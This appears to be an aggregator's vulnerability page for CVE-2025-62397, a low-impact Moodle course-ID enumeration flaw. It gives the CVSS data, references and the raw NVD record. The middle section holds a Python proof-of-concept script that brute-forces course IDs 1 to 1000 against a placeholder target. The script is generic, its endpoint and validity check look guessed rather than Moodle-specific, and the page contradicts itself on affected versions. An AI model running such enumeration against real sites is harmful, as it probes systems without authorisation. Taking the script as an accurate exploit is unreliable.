CVE-2025-62397

Description

The router’s inconsistent response to invalid course IDs allowed attackers to infer which course IDs exist, potentially aiding reconnaissance.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:moodle:moodle:*:*:*:*:*:*:*:* - VULNERABLE

未知具体版本（建议查看厂商官方公告）

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-62397 PoC - Course ID Enumeration
# This PoC demonstrates how inconsistent responses can leak valid course IDs

import requests
import time
import json
from concurrent.futures import ThreadPoolExecutor

TARGET_URL = "http://target-server/api/courses"
TEST_IDS = range(1, 1001)  # Test course IDs 1-1000

def test_course_id(course_id):
    """Test a single course ID and analyze response"""
    url = f"{TARGET_URL}/{course_id}"
    try:
        start_time = time.time()
        response = requests.get(url, timeout=10)
        elapsed = time.time() - start_time
        
        return {
            'course_id': course_id,
            'status_code': response.status_code,
            'response_time': elapsed,
            'content_length': len(response.content),
            'response_contains_data': b'course' in response.content.lower() or b'id' in response.content.lower()
        }
    except requests.exceptions.RequestException as e:
        return {'course_id': course_id, 'error': str(e)}

def analyze_responses(responses):
    """Analyze responses to identify valid course IDs"""
    # Group responses by status code
    status_groups = {}
    for resp in responses:
        if 'error' not in resp:
            status = resp['status_code']
            if status not in status_groups:
                status_groups[status] = []
            status_groups[status].append(resp)
    
    print("\n=== Response Analysis ===")
    for status, items in status_groups.items():
        avg_time = sum(i['response_time'] for i in items) / len(items)
        has_data = sum(1 for i in items if i['response_contains_data'])
        print(f"Status {status}: {len(items)} requests, avg_time={avg_time:.3f}s, with_data={has_data}")
    
    # Identify likely valid IDs based on response patterns
    valid_ids = []
    for resp in responses:
        if 'error' not in resp:
            # Valid course might return 200 with course data
            # Invalid course might return 404 with no course data
            if resp['status_code'] == 200 and resp['response_contains_data']:
                valid_ids.append(resp['course_id'])
    
    return valid_ids

def main():
    print(f"[*] Starting CVE-2025-62397 enumeration test")
    print(f"[*] Target: {TARGET_URL}")
    print(f"[*] Testing {len(list(TEST_IDS))} course IDs...")
    
    # Test course IDs with threading for efficiency
    responses = []
    with ThreadPoolExecutor(max_workers=10) as executor:
        futures = [executor.submit(test_course_id, cid) for cid in TEST_IDS]
        for future in futures:
            responses.append(future.result())
    
    # Analyze and identify valid IDs
    valid_ids = analyze_responses(responses)
    
    print(f"\n[+] Potentially valid course IDs found: {valid_ids}")
    print(f"[*] Total: {len(valid_ids)} valid courses identified")
    
    # Save results
    with open('cve_2025_62397_results.json', 'w') as f:
        json.dump({'valid_ids': valid_ids, 'all_responses': responses}, f, indent=2)
    print(f"[*] Results saved to cve_2025_62397_results.json")

if __name__ == "__main__":
    main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-62397
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-62397
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-62397/
[4] VulDB https://vuldb.com/cve/CVE-2025-62397
[5] https://access.redhat.com/security/cve/CVE-2025-62397
[6] https://bugzilla.redhat.com/show_bug.cgi?id=2404430

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-62397", "sourceIdentifier": "[email protected]", "published": "2025-10-23T12:15:32.270", "lastModified": "2025-11-14T19:19:30.210", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The router’s inconsistent response to invalid course IDs allowed attackers to infer which course IDs exist, potentially aiding reconnaissance."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-209"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:moodle:moodle:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.0.0", "versionEndExcluding": "5.0.3", "matchCriteriaId": "672DBB86-D5A8-41B6-B6F3-8E323E9C21F0"}]}]}], "references": [{"url": "https://access.redhat.com/security/cve/CVE-2025-62397", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2404430", "source": "[email protected]", "tags": ["Issue Tracking", "Third Party Advisory"]}]}}